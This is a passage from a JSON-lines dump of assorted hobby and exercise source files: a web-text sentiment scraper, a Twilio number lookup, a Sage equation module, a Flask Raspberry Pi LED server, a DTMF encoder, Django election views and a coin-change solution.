i[0] == letter.lower() and i in same_words:\r\n for j in word_list:\r\n if j == i and not i in duplicate_list:\r\n duplicate_list.append(i)\r\n \r\n for k in duplicate_list:\r\n for i in word_list:\r\n if k == i:\r\n duplicates += 1\r\n print(\"There are\", duplicates, \" duplicates of the word\", k)\r\n duplicates = 0\r\n \r\n print(duplicate_list)\r\n print(same_words)\r\n\r\n\r\nget_words_starting_with(sample_text,\"p\")\r\n\r\n","sub_path":"Practical 05/Exercise 2-4 - Word beginning with a letter.py","file_name":"Exercise 2-4 - Word beginning with a letter.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"457221643","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n\nAuthor: Nick Hughes\nWebsite: absolutelynick.co.uk\n\nCreated: 18/01/2015\n\n(C) 01/2015\n\n Searches given websites, links, images and looks for Positive and Negative Data\n\n from pprint import pformat as pp\n scrubber = Scrub(\n searchSites = 3 # (list or int) list of sites or number to search\n # searchSites = [\"http://www.bbc.co.uk/\"], \"http://www.gov.uk/\"],\n searchText = \"football\",\n searchPictures = 0,\n checkUrl = 0,\n keywords = [\"foot\",\"player\",\"big\"],\n debug = False,\n )\n info = scrubber.Run()\n print type(info)\n print len(info)\n print pp(dict(info))\n\n\"\"\"\n\nimport os\nimport urllib2\nimport common\nimport re\n\nfrom words import words\nfrom image_ocr import image_ocr\nfrom datetime import datetime as time\nfrom BeautifulSoup import BeautifulSoup, Comment\nfrom pattern.en import sentiment\nfrom google import search\n\n\nclass Storage(dict):\n\n def __init__(self, data):\n\n for d in data: self[d] = {}\n\n def __getattr__(self, name):\n return self[name]\n\n def __setattr__(self, name, value):\n self[name] = value\n\nclass Scrub(object):\n\n def __init__(self, **kwargs ):\n\n # Basic check for input\n\n self.Check_Input(kwargs)\n\n self.path = os.path.dirname(__file__)\n\n # Returns current load information from the window for users\n\n self.progressBar = kwargs[\"progressBar\"] if \"progressBar\" in kwargs else None\n\n # Parameters needed for running\n\n self.searchText = kwargs[\"searchText\"].lower()\n self.searchPictures = kwargs[\"searchPictures\"] if \"searchPictures\" in kwargs else 0\n self.checkUrl = kwargs[\"checkUrl\"] if \"checkUrl\" in kwargs else 0\n self.keywords = kwargs[\"keywords\"] if \"keywords\" in kwargs else []\n self.debug = kwargs[\"debug\"] if \"debug\" in kwargs else 0\n\n self.positiveWords = set(words.Positive_Words())\n self.negativeWords = set(words.Negative_Words())\n self.profanityWords = set(words.Profanity())\n\n # Getting sites to search\n\n self.websites = self.Get_Websites(kwargs)\n\n self.website_Dict = Storage(self.websites)\n\n\n def Run(self):\n \"\"\"\n Main function to call when script has been initiated with args for running.\n\n Reads the sites with set parameters and returns gathered information.\n\n :return: Returns all the gathered data to the user\n :rtype: Dict\n \"\"\"\n\n if self.progressBar: self.progressBar(setMax=len(self.websites),value=0 )\n\n if not self.websites: return None\n\n for num,url in enumerate(self.websites):\n\n text = self.__Get_ProgressBar_Text__(url)\n\n # Try for the setup catching websites failing to load\n if self.progressBar: self.progressBar(text=text,value=(num+1))\n\n if self.checkUrl and (common.Check_Url(url) == False): continue\n\n data = self.Read_Website(url)\n\n self.website_Dict[url] = 
data\n\n return self.website_Dict\n\n @staticmethod\n def __Get_ProgressBar_Text__(url):\n \"\"\"\n Formats the text for easier readability of the user\n :param url: Web URL Address\n :type url: String\n :return: Formatted string\n :rtype: String\n \"\"\"\n\n cleaners = [\"http://www.\",\"http://\",\"https://\",\"https:\",\"www1.\"]\n\n for i in cleaners: url = url.replace(i,\"\")\n\n if url.split(\"/\",1)[0] == url.split(\"/\",1)[-1]:\n\n return \"Scanning:\\n\\n%s\" % url.split(\"/\",1)[0]\n\n return \"Scanning:\\n\\n%s\\n%s\" % (url.split(\"/\",1)[0],url.split(\"/\",1)[-1])\n\n @staticmethod\n def Get_Websites(args):\n \"\"\"\n If websites are not provided in Kwargs then will use google to get a list.\n :param args: Website Kwargs\n :type args: Dict\n :return: Websites that can be scrubbed, either provided or gathered\n :rtype: List\n \"\"\"\n\n sites = args[\"searchSites\"]\n\n if type(sites) != list:\n try:\n googleSites = [str(i) for i in search(str(args[\"searchText\"]), stop=sites)]\n sites = googleSites[:sites]\n except urllib2.HTTPError:\n return []\n\n return sites\n\n @staticmethod\n def Check_Input(args):\n \"\"\"\n Keyword check for needed parameters of the script\n :param args: Website Kwargs\n :type args: Dict\n :return: Raises error if params not met\n\n \"\"\"\n\n if (\"searchSites\" not in args) and type(args[\"searchSites\"]) != (list or int):\n\n raise ValueError(\"Please enter a list of Websites ('searchSites') or an amount of sites to search as an integer.\")\n\n def Read_Website(self, siteName):\n \"\"\"\n Reads information from a website\n\n Variables:\n\n siteName = ( site name after 'www.' )\n\n :param siteName: Website Address\n :type siteName: String\n :return: Site data\n :rtype: Dict\n\n \"\"\"\n # Call to the site to gather the data\n\n rawData = self.Get_Website_Data(siteName)\n\n # Cleans the data removing tags\n cleanData, imageCount = self.Get_Untagged_Body_Data(rawData)\n\n # Search with in the list of Positive and negative keywords\n dataSet = set(cleanData.split(\" \"))\n\n return {\n \"last_updated\":common.Last_Modified(siteName),\n \"clean_data\":cleanData,\n \"images\": imageCount,\n \"search_word\":cleanData.count(self.searchText),\n \"search_keywords\": self.Search_Keywords(cleanData),\n \"language_analysis\":self.Language_Analysis(cleanData),\n \"profanity_words\":len(dataSet.intersection(self.profanityWords)),\n \"positive_words\":len(dataSet.intersection(self.positiveWords)),\n \"negative_words\":len(dataSet.intersection(self.negativeWords)),\n \"neutral_words\":self.Get_Neutral_Words(cleanData),\n }\n\n def Get_Neutral_Words(self, data):\n \"\"\"\n Scanning for neutral words\n :param data: Cleaned String\n :type data: String\n :return: Length of neutral words\n :rtype: Integer\n \"\"\"\n wordSentiment = set([i[0][0] for i in sentiment(data).assessments])\n\n # Removes unneeded punctuation\n cleanData = [i for i in re.findall(r\"[\\w']+|[.,!?;]\", data) if len(i)>2]\n\n # Finds that symmetric difference\n neutral = len( set(wordSentiment) ^ set(cleanData))\n\n return neutral\n\n def Get_Untagged_Body_Data(self, raw_data): # TODO\n \"\"\"\n Remove the unwanted data outside of the body tags in the HTML\n :param raw_data: Read HTML Page\n :type raw_data: String\n :return: Cleaned body text\n :rtype: String\n \"\"\"\n try:\n\n return self.Clean_Site_Data(raw_data)\n\n except AttributeError: # NoneTypeError returned from body read or Ascii Issue\n\n return raw_data, 0\n\n def Search_Keywords(self, text):\n \"\"\"\n Search for keywords in the 
website clean text\n :param text: Website text\n :type text: string\n :return: the amount of matching words found\n :rtype: integer\n \"\"\"\n\n if self.keywords:\n\n word_count = dict( (word,text.count(word)) for word in self.keywords )\n\n return word_count if self.keywords else {}\n\n def Clean_Site_Data(self, data):\n \"\"\"\n Changes all the data to a beautiful soup object. Cleans the full site tags and data\n :param data: Website readout\n :type data: string\n :return: The full site with the tags removed and only the text visible to the user\n :return: The image amounts\n :rtype: string, integer\n \"\"\"\n\n if not data: return \"\", 0\n\n # Module for looking over the content of the site\n soup = BeautifulSoup(data)\n\n # Takes all the data from inside the html tags body\n try:\n soup = BeautifulSoup(\"\".join([ str(i) for i in (soup.body) if str(i) ]))\n except TypeError:\n return \"\", 0\n\n data = self.Remove_HTML_Layers(soup)\n\n pageImages = []\n\n # Search images for text\n if self.searchPictures:\n\n # Get address of all images\n pageImages = [str(i[\"src\"]) for i in soup.findAll('img', {\"src\": True}) if \"http://\" in i[\"src\"]]\n\n try:\n if pageImages: data += self.Get_Image_Text(pageImages)\n except UnicodeEncodeError:\n pass\n\n return data, len(pageImages)\n\n @staticmethod\n def Remove_HTML_Layers(soup):\n \"\"\"\n Cleans all the site string and unicode data, from all the comments and tags.\n :param data: html soup\n :type data: soup object\n :return: The full site with the tags removed and only the text visible to the user\n :rtype: string\n \"\"\"\n # Remove coding Comments\n [c.extract() for c in soup.findAll(text=lambda text:isinstance(text, Comment))]\n\n # Remove the HTML Tags\n [[s.extract() for s in soup(tag)] for tag in [\"script\",\"img\",\"noscript\",\"form\",\"style\"]]\n\n checker = lambda i: i not in [\"\\n\",\"\\t\",\"\\r\",\" \"]\n\n texts = \" \".join([str(i) for i in soup.findAll(text=True) if checker(i) ] )\n\n for item in [\"\\n\",\"\\t\",\"\\r\",\" \",\"&\"]: texts = texts.replace(item,\" \")\n\n # Common Unicode issues with the data\n data = \" \".join([str(i) for i in texts.split(\" \") if i != \"\"]).replace(\"'\",\"'\").replace(\" ; \",\"\").replace(\"’\",\"'\")\n\n return data\n\n @staticmethod\n def Get_Image_Text(images):\n \"\"\"\n Search images for text\n :param images: Image paths\n :type images: List of strings\n :return: Text Found\n :rtype: String\n \"\"\"\n\n text = \"\"\n\n for img in images:\n\n OCR = image_ocr.Image_OCR()\n\n imageText = OCR.Read_Image(\n loadFile = img,\n read_photo = True ,\n delete = True,\n )\n\n if imageText: text += \". 
\" + imageText\n\n return text\n\n @staticmethod\n def Language_Analysis(text):\n \"\"\"\n Takes a sentence or or paragraph for analysis with the sentiment module looking for positivity and negativity\n :param text: Sentence or Paragraph\n :type text: string\n :return: (1 to -1, 1 to -1) positivity, subjectivity\n :rtype: tuple\n \"\"\"\n\n return tuple(sentiment(text))\n\n @staticmethod\n def Get_Website_Data(url):\n \"\"\"\n Looks at a web Url and checks that it exists and loads\n :param url: Web Address\n :type url: String\n :return: Website code\n :rtype: String\n \"\"\"\n\n try: response = str(urllib2.urlopen(url).read())\n except (urllib2.HTTPError,urllib2.URLError):\n response = \"\"\n\n return response.lower()\n\n @staticmethod\n def Get_Datetime(option=1):\n \"\"\"\n Gives you current time\n :param option: Format wanted\n :type option: int\n :return: date and time\n :rtype: string\n \"\"\"\n\n timeOutput = time.strftime(\"%Y_%m_%d__%H_%M\") if option == 1 else time.strftime(\"%Y_%m_%d %H:%M\")\n\n return timeOutput\n","sub_path":"modules/web_scrubber/website_scrubber.py","file_name":"website_scrubber.py","file_ext":"py","file_size_in_byte":11625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"463931685","text":"from twilio.rest import Client\nfrom twilio.base.exceptions import TwilioRestException\nimport toml\nimport logging\n\nfrom ..utils import export\nfrom .. import _config\n\n_logger = logging.getLogger('lds_robocalling.services.phone')\n_config = _config['phone']\n_client = Client(_config['account_sid'], _config['auth_token'])\n\ndef clean_number(number):\n if number is None:\n return ''\n elif number.startswith('+1'):\n number = number[2:]\n elif number.startswith('1'):\n number = number[1:]\n return ''.join(c for c in number if c.isdigit())\n\ndef compare_numbers(num1,num2):\n return clean_number(num1) == clean_number(num2)\n\n@export\ndef national_format(num):\n num = clean_number(num)\n return '({}) {}-{}'.format(num[:3], num[3:6],num[6:])\n\nfrom . 
import db\n_phone_book = db.get_phone_book()\n\n@export\ndef text(self, body, to=None):\n if to is None: to = _config['admin_number']\n to = clean_number(to)\n message = _client.messages.create(body=body, to=to, from_=_config['phone_number']) \n\n@export\ndef lookup(number):\n number = clean_number(number)\n if len(number) < 8:\n return number,'invalid'\n elif national_format(number) in _phone_book:\n return number, _phone_book[national_format(number)]\n try:\n number_data = _client.lookups.phone_numbers.get(number).fetch(add_ons='twilio_carrier_info')\n number_data.phone_number \n _phone_book[national_format(number)] = number_data.add_ons['results']['twilio_carrier_info']['result']['carrier']['type']\n db.add_phone_type(national_format(number), _phone_book[national_format(number)])\n except TwilioRestException as e:\n if e.code == 20404:\n return number, 'invalid'\n else:\n raise e\n # print(number, number_data.add_ons['results']['twilio_carrier_info']['result']['carrier']['type'])\n return number, number_data.add_ons['results']['twilio_carrier_info']['result']['carrier']['type']\n\n ","sub_path":"lds_robocalling/services/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585161880","text":"# -*- coding: utf-8 -*-\n\"\"\"Core equation type.\"\"\"\n\nfrom __future__ import absolute_import\n\nimport ast\nimport inspect\nimport sys\nimport warnings\n\nfrom sage.all import SR, Expression\nfrom sage.misc.latex import latex\nfrom sage.rings import integer, real_mpfr\n\nfrom ..variables import SHORT_UNIT_SYMBOLS, Variable\nfrom ..variables._core import BaseVariable\n\n\ndef convert(expr):\n \"\"\"Convert a given expression.\"\"\"\n op = expr.operator()\n ops = expr.operands()\n if op:\n return op(*(convert(o) for o in ops))\n return expr.convert() if hasattr(expr, 'convert') else expr\n\n\nclass BaseEquation(Expression):\n \"\"\"Add definition and short unit.\"\"\"\n\n @property\n def __doc__(self):\n return self.definition.__doc__\n\n @property\n def definition(self):\n return Equation.__registry__[self]\n\n def expand_units(self, simplify_full=True):\n \"\"\"Expand units of all arguments in expression.\"\"\"\n used_units = {}\n # Need to multiply units with variable,\n # so that we can devide by the symbolic equation later:\n for variable in self.arguments():\n used_units[variable] = variable * Variable.__units__[variable]\n\n result = BaseEquation(SR, self.subs(used_units) / self).convert()\n if simplify_full:\n result = result.simplify_full()\n return result\n\n def short_units(self):\n \"\"\"Return short units of equation.\"\"\"\n expanded = self.expand_units()\n return expanded.lhs().subs(SHORT_UNIT_SYMBOLS) \\\n == expanded.rhs().subs(SHORT_UNIT_SYMBOLS)\n\n def convert(self):\n return convert(self)\n\n\n_Integer = ast.parse('integer.Integer', mode='eval').body\n_Float = ast.parse('real_mpfr.RR', mode='eval').body\n\n\nclass Numbers(ast.NodeTransformer):\n \"\"\"Change Python numbers to Sage numbers.\"\"\"\n\n def visit_Num(self, node):\n \"\"\"Rewrite int / int to Fraction(int, int).\"\"\"\n func = _Integer\n if isinstance(node.n, float):\n func = _Float\n return ast.copy_location(\n ast.Call(\n func=func,\n args=[ast.Str(str(node.n))],\n keywords=[],\n starargs=None,\n kwargs=None, ), node)\n\n\nclass ClassDef(ast.NodeVisitor):\n \"\"\"Extract expression definition.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize class definition.\"\"\"\n self.expr = None\n\n 
def visit_Assign(self, node):\n \"\"\"Find 'expr = '.\"\"\"\n for target in node.targets:\n if target.id != 'expr':\n continue\n expr = ast.Expression(Numbers().visit(node.value))\n ast.fix_missing_locations(expr)\n self.expr = compile(expr, '', mode='eval')\n break\n\n\ndef build_instance_expression(instance, expr, back=1):\n \"\"\"Return fixed expression.\"\"\"\n try:\n # Evaluate expression in the original context.\n frame = sys._getframe(back + 1)\n\n # Find original code and convert numbers.\n code = ast.parse(inspect.getsource(instance))\n class_def = ClassDef()\n class_def.visit(code)\n\n # Include names used during number replacement.\n f_globals = frame.f_globals.copy()\n f_globals.setdefault('integer', integer)\n f_globals.setdefault('real_mpfr', real_mpfr)\n\n # Include locally defined variables.\n f_locals = frame.f_locals.copy()\n for name in dir(instance):\n data = getattr(instance, name)\n if isinstance(data, BaseVariable):\n f_locals[name] = data\n expr = eval(class_def.expr, f_globals, f_locals)\n except TypeError:\n pass\n\n return BaseEquation(SR, expr)\n\n\nclass EquationMeta(type):\n \"\"\"Equation interface.\"\"\"\n\n def __new__(cls, name, parents, dct):\n \"\"\"Build and register new variable.\"\"\"\n if '__registry__' not in dct:\n dct.setdefault('name', name)\n expr = dct.pop('expr')\n\n instance = super(EquationMeta, cls).__new__(\n cls, name, parents, dct)\n instance.expr = expr = build_instance_expression(instance, expr)\n\n if expr in instance.__registry__:\n warnings.warn(\n 'Equation \"{0}\" will be overridden by \"{1}\"'.format(\n instance.__registry__[expr].__module__ + ':' + name,\n instance.__module__ + ':' + name, ),\n stacklevel=2)\n instance.__registry__[expr] = instance\n\n expanded_units = expr.expand_units()\n if not expanded_units:\n raise ValueError(\n 'Invalid expression units: {0}'.format(expanded_units))\n return expr\n\n return super(EquationMeta, cls).__new__(cls, name, parents, dct)\n\n\nclass Equation(object):\n \"\"\"Base type for all equations.\"\"\"\n __metaclass__ = EquationMeta\n __registry__ = {}\n\n @classmethod\n def args(cls):\n return tuple(Variable.__registry__[arg].expr\n if arg in Variable.__registry__ else arg\n for arg in cls.expr.args())\n\n\n__all__ = ('Equation', 'convert', )\n","sub_path":"essm/equations/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"76423909","text":"from fpdf import FPDF\nfrom PIL import Image\nimport glob\n\npdf = FPDF()\n\nimageList = glob.glob(\"*.png\")\nif len(imageList) > 0:\n\tfor image in imageList:\n\t\tcover = Image.open(image)\n\t\twidth, height = cover.size\n\t\twidth, height = float(width * 0.264583), float(height * 0.264583)\n\n\t\tpdf_size = {'P': {'w': 210, 'h': 297}, 'L': {'w': 297, 'h': 210}}\n\n\t\torientation = 'P' if width < height else 'L'\n\n\t\twidth = width if width < pdf_size[orientation]['w'] else pdf_size[orientation]['w']\n\t\theight = height if height < pdf_size[orientation]['h'] else pdf_size[orientation]['h']\n\n\t\tpdf.add_page(orientation=orientation)\n\n\t\tpdf.image(image, 0, 0, width, height)\n\tpdf.output(\"newPdf.pdf\", \"F\")\n\tprint(\"file created\")\nelse:\n\tprint(\"This type of image does not exist within this directory!!\")","sub_path":"pngToPdf.py","file_name":"pngToPdf.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
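The pngToPdf record above scales Pillow pixel sizes by a bare 0.264583 before handing them to FPDF, which works in millimetres. As a minimal sketch of where that constant comes from (my own illustration, not a dataset record; the helper name px_to_mm is hypothetical), assuming the common 96 DPI reference resolution, one pixel is 25.4 / 96 mm:

# Illustration only -- not part of the dataset. At 96 DPI,
# 1 px = 25.4 mm/inch / 96 px/inch = 0.2645833... mm, matching the
# 0.264583 factor hard-coded in the pngToPdf script above.
def px_to_mm(pixels, dpi=96):
    return pixels * 25.4 / dpi

assert abs(px_to_mm(1) - 0.264583) < 1e-5

At any other export DPI the factor changes, which is presumably why the script only fits images rendered at 96 DPI exactly.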
+{"seq_id":"481771140","text":"from flask import Flask\nimport RPi.GPIO as GPIO\n\napp=Flask(__name__) #객체생성\n\nledPin = 14\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(ledPin,GPIO.OUT)\n\n\n@app.route('/')\ndef flask():\n\treturn \"Hello Flask\"\n@app.route('/led/on')\ndef ledOn():\n\tGPIO.output(ledPin,True) #한번켜지는 명령을 계속주는 것이다\n\treturn \"

Led ON

\"\n\n@app.route('/led/off')\ndef ledOff():\n\tGPIO.output(ledPin,False) #한 번 꺼지는 명령을 계속 주는 것이다\n\treturn \"

Led off

\"\n\n@app.route('/led/clean')\ndef clean():\n\tGPIO.cleanup()\n\treturn \"

GPIO Clean

\"\n\nif __name__==\"__main__\":\n\tapp.run(host=\"0.0.0.0\",port=\"8080\")\n","sub_path":"Flask/appLedTest.py","file_name":"appLedTest.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"582019928","text":"from time import sleep\r\n\r\nwork_time = int(input(\"Enter work time in minutes: \"))\r\nrest_time = int(input(\"Enter rest itme minutes: \"))\r\nnum_of_repeats = int(input(\"Enter number of repeats in minutes: \"))\r\n\r\nimport winsound\r\nfrequency = 2500 # Set Frequency To 2500 Hertz\r\nduration = 1000 # Set Duration To 1000 ms == 1 second\r\n\r\ndef beep():\r\n winsound.Beep(frequency, duration)\r\n\r\ndef annoy():\r\n for i in range(1, 10): winsound.Beep(i * 100, 200)\r\n\r\n\r\nfor i in range(num_of_repeats +1):\r\n \r\n print(str(i + 1) + \": Working!\")\r\n beep()\r\n for i in range(1, work_time):\r\n print(i)\r\n sleep(60)\r\n\r\n print(\"Resting\")\r\n annoy()\r\n for i in range(1, rest_time +1):\r\n print(i)\r\n sleep(60)\r\n","sub_path":"interval_timer.py","file_name":"interval_timer.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"52223075","text":"import Tones\nimport serial\nimport serial.tools.list_ports\nimport DateTime\nimport pyaudio\nimport array\n\n\n\n\nclass Coder():\n def __init__(self):\n self.Time = {\"ID\" : 5, \n \"Month\" : 0, \n \"Day\" : 0,\n \"Hour\" : 0,\n \"Minute\": 0,\n \"Second\": 0}\n self.dt = DateTime.DateTime()\n self.ser = serial.Serial(port='COM4', \\\n baudrate=115200, \\\n parity=serial.PARITY_NONE, \\\n stopbits=serial.STOPBITS_ONE,\\\n bytesize=serial.EIGHTBITS, \\\n timeout=0)\n\n self.ser.write(b\"debug.gps.sniff\\r\")\n\n def __StringToTime(self, string):\n str = [s for s in string.split()]\n self.Time[\"Month\"] = int(str[3][0:2])\n self.Time[\"Day\"] = int(str[3][2:4])\n self.Time[\"Hour\"] = int(str[4][0:2])\n self.Time[\"Minute\"] = int(str[4][2:4])\n self.Time[\"Second\"] = int(str[4][4:6])\n\n def __TimeToDateTime(self):\n self.dt.setSeconds(self.Time['Second'])\n self.dt.setMinutes(self.Time['Minute'])\n self.dt.setHours(self.Time['Hour'])\n self.dt.setDays(self.Time['Day'])\n self.dt.setMonth(self.Time['Month'])\n self.dt.setId(self.Time['ID'])\n\n def __DateTimeToDTMF(self):\n bufferDTMF = []\n p = pyaudio.PyAudio()\n l = [0] * 5000\n stream = p.open(format=p.get_format_from_width(2),\n channels=1,\n rate=44100,\n output=True)\n\n string = str(hex(self.dt.id)[2:]) + str(hex(self.dt.data)[2:])\n \n for i in string:\n bufferDTMF += Tones.Tones[i]\n \n bufferDTMF += l\n\n bufferDTMF = array.array('B', bufferDTMF).tostring()\n\n stream.write(bufferDTMF)\n\n def run(self):\n buffer = []\n while True:\n for c in self.ser.read():\n c = chr(c)\n buffer.append(c)\n if c == '\\r':\n str = ''.join(buffer)\n self.__StringToTime(str)\n self.__TimeToDateTime()\n self.__DateTimeToDTMF()\n print(str)\n line = []\n \n\n\n\n\n\ndef ListAvailableComPorts():\n list = serial.tools.list_ports.comports()\n for element in list:\n print(element.device)\n\ndef DataToTime(data):\n str = [s for s in data.split()]\n Time[\"Month\"] = int(str[3][0:2])\n Time[\"Day\"] = int(str[3][2:4])\n Time[\"Hour\"] = int(str[4][0:2])\n Time[\"Minute\"] = int(str[4][2:4])\n Time[\"Second\"] = int(str[4][4:6])\n return Time\n\ndef EncodeData(data):\n dt.setSeconds(Time['Second'])\n dt.setMinutes(Time['Minute'])\n dt.setHours(Time['Hour'])\n dt.setDays(Time['Day'])\n 
dt.setMonth(Time['Month'])\n dt.setId(Time['ID'])\n\n return dt\n\ndef DataToDTMF(data):\n bufferDTMF = []\n p = pyaudio.PyAudio()\n\n stream = p.open(format=p.get_format_from_width(2),\n channels=1,\n rate=44100,\n output=True)\n\n string = str(hex(data.id)[2:]) + str(hex(data.data)[2:])\n \n for i in string:\n bufferDTMF += Tones.Tones[i]\n \n bufferDTMF += l\n\n bufferDTMF = array.array('B', bufferDTMF).tostring()\n\n stream.write(bufferDTMF)\n \n return bufferDTMF\n\n\ndef main():\n buffer = []\n coder = Coder()\n coder.run()\n\n #ser = serial.Serial(port='COM4', \\\n # baudrate=115200, \\\n # parity=serial.PARITY_NONE, \\\n # stopbits=serial.STOPBITS_ONE,\\\n # bytesize=serial.EIGHTBITS, \\\n # timeout=0)\n\n #ser.write(b\"debug.gps.sniff\\r\")\n\n #while True:\n # for c in ser.read():\n # c = chr(c)\n # buffer.append(c)\n # if c == '\\r':\n # str = ''.join(buffer)\n # Time = DataToTime(str)\n \n # DataToDTMF(EncodeData(Time))\n # print(str)\n # line = []\n # break\n\n #ser.close()\n\nif __name__ == \"__main__\":\n main()","sub_path":"FunctionsBackup.py","file_name":"FunctionsBackup.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"302895656","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Candidate, Position, Vresults\nfrom django.utils import timezone\nfrom .forms import CreateNewCandidate\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import get_user_model\nfrom django.contrib import messages\nfrom django.contrib.auth import login, logout, authenticate, update_session_auth_hash\nfrom django.urls import reverse\nfrom django.template import loader\nimport datetime\n\nUser = get_user_model()\n\n# Create your views here.\n\n\ndef main(request):\n return render(request, 'voter_account/main.html')\n\n\n@login_required(login_url='/voter_account/signup')\ndef home(request):\n candidates = Candidate.objects\n return render(request, 'candidate_page/home.html', {'candidates': candidates})\n\n\n@login_required(login_url='/voter_account/signup')\ndef create(request):\n # reglimit = datetime.date(2021, 7, 10)\n # tday = datetime.date.today()\n # if tday >= reglimit:\n # messages.warning(request, 'Sorry, the registration period has ended!')\n # return redirect('regend')\n # else:\n form = CreateNewCandidate()\n if Candidate.objects.filter(account=request.user).exists():\n messages.warning(\n request, 'You have already registered for a position!')\n return render(request, 'candidate_page/create.html', {'form': form})\n else:\n if request.method == 'POST':\n form = CreateNewCandidate(\n request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.account = request.user\n instance.save()\n messages.success(\n request, 'You have successfully registered as a candidate!')\n return redirect('/candidate_page/' + str(instance.id))\n else:\n return render(request, 'candidate_page/create.html', {'form': form, 'error': 'All fields are required'})\n\n else:\n form = CreateNewCandidate()\n return render(request, 'candidate_page/create.html', {'form': form})\n\n\n@login_required(login_url='/voter_account/signup')\ndef detail(request, instance_id):\n candidate = get_object_or_404(Candidate, pk=instance_id)\n return render(request, 'candidate_page/detail.html', {'candidate': 
candidate})\n\n\n@login_required(login_url='/voter_account/signup')\ndef candidates(request):\n candidates = Candidate.objects\n return render(request, 'candidate_page/candidate.html', {'candidates': candidates})\n\n\n@login_required(login_url='/voter_account/signup')\ndef regend(request):\n return render(request, 'candidate_page/regend.html')\n\n\n@login_required(login_url='/voter_account/signup')\ndef votepage(request):\n votestart = datetime.date(2020, 7, 21)\n voteend = datetime.date(2023, 7, 28)\n tday = datetime.date.today()\n if tday >= votestart and tday <= voteend:\n position_list = Position.objects\n return render(request, 'candidate_page/votepage.html', {'position_list': position_list})\n elif tday <= votestart:\n messages.warning(request, 'Sorry, voting will start on 2021/07/18 !')\n return redirect('regend')\n else:\n messages.warning(request, 'Sorry, the voting period has ended !')\n return redirect('regend')\n\n\n@login_required(login_url='/voter_account/signup')\ndef votedetail(request, position_id):\n try:\n position = Position.objects.get(pk=position_id)\n except Position.DoesNotExist:\n raise Http404('Position does not exist')\n return render(request, 'candidate_page/votedetail.html', {'position': position})\n\n\n@login_required(login_url='/voter_account/signup')\ndef vote(request, position_id):\n sposition = get_object_or_404(Position, pk=position_id)\n if request.method == \"POST\":\n voter = Vresults.objects.get_or_create(\n account=request.user, position=sposition)[0]\n if voter.status == False:\n try:\n selected_candidate = sposition.candidate_set.get(\n pk=request.POST['candidate'])\n except (KeyError, Candidate.DoesNotExist):\n messages.warning(request, 'You did not select a candidate')\n return render(request, 'candidate_page/votedetail.html', {'position': sposition})\n else:\n selected_candidate.total_vote += 1\n selected_candidate.save()\n voter.status = True\n voter.save()\n return HttpResponseRedirect(reverse('detailresults', args=(position_id,)))\n else:\n messages.warning(request, 'You already voted for this position!')\n return render(request, 'candidate_page/votedetail.html', {'position': sposition})\n else:\n return render(request, 'candidate_page/votedetail.html', {'position': sposition})\n\n\n@login_required(login_url='/voter_account/signup')\ndef detailresults(request, position_id):\n position = get_object_or_404(Position, pk=position_id)\n return render(request, 'candidate_page/detailresults.html', {'position': position})\n\n\n@login_required(login_url='/voter_account/signup')\ndef results(request):\n candidates = Candidate.objects.all().order_by('position', '-total_vote')\n return render(request, 'candidate_page/results.html', {'candidates': candidates})\n","sub_path":"candidate_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"443536187","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 2 11:37:31 2019\r\n\r\n@author: hjiang\r\n\"\"\"\r\n\r\n\"\"\"\r\nYou are given coins of different denominations and a total amount of money amount. \r\nWrite a function to compute the fewest number of coins that you need to make up that amount. 
\r\nIf that amount of money cannot be made up by any combination of the coins, return -1.\r\n\r\nExample 1:\r\n\r\nInput: coins = [1, 2, 5], amount = 11\r\nOutput: 3 \r\nExplanation: 11 = 5 + 5 + 1\r\nExample 2:\r\n\r\nInput: coins = [2], amount = 3\r\nOutput: -1\r\nNote:\r\nYou may assume that you have an infinite number of each kind of coin.\r\n\r\nProblem gist: find the fewest number of coins needed\r\n\"\"\"\r\n# Time: O(n * k), n is the number of coins, k is the amount of money\r\n# Space: O(k)\r\n# DP solution. (1680ms)\r\n\r\nclass Solution(object):# This one no longer times out, and the idea is clear; this answer works too\r\n    def coinChange(self, coins, amount):\r\n        \"\"\"\r\n        :type coins: List[int]\r\n        :type amount: int\r\n        :rtype: int\r\n        \"\"\"\r\n        INF = 0x7fffffff # Using float(\"inf\") would be slower. For minimization problems like this, reach for float(\"inf\") first\r\n        amounts = [INF] * (amount + 1)\r\n        amounts[0] = 0\r\n        for i in range(amount + 1):\r\n            if amounts[i] != INF:\r\n                for coin in coins:\r\n                    if i + coin <= amount:\r\n                        amounts[i + coin] = min(amounts[i + coin], amounts[i] + 1)# Key step: amount i + coin can be made with amounts[i] + 1 coins\r\n        return amounts[amount] if amounts[amount] != INF else -1\r\n    \r\n    \r\n#Assume dp[i] is the fewest number of coins making up amount i, then for every coin in coins, dp[i] = min(dp[i - coin] + 1).\r\n#\r\n#The time complexity is O(amount * coins.length) and the space complexity is 